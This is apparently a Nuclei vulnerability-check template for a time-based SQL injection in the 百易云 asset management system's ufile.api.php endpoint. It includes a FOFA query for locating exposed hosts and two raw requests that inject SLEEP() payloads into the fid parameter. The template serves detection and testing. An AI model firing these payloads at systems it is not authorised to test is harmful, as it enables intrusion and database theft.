id: baiyiyun-ufile_api_php-sql

info:
  name: 百易云资产管理运营系统 ufile.api.php SQL延时注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="不要着急，点此"
    百易云资产管理运营系统 ufile.api.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488749&idx=1&sn=a35b4beffde4e4a596121f39f48b5c92&chksm=c267a1def51028c878236da3277f12c6683610306f4ec281fad5b7b898e669981cb1481a80b6&token=555018471&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        GET /api/file/ufile.api.php?act=filedel&fid=1%20AND%20(SELECT%207357%20FROM%20(SELECT(SLEEP(2)))UPCw) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
      - |
        GET /api/file/ufile.api.php?act=filedel&fid=1%20AND%20(SELECT%207357%20FROM%20(SELECT(SLEEP(4)))UPCw) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and



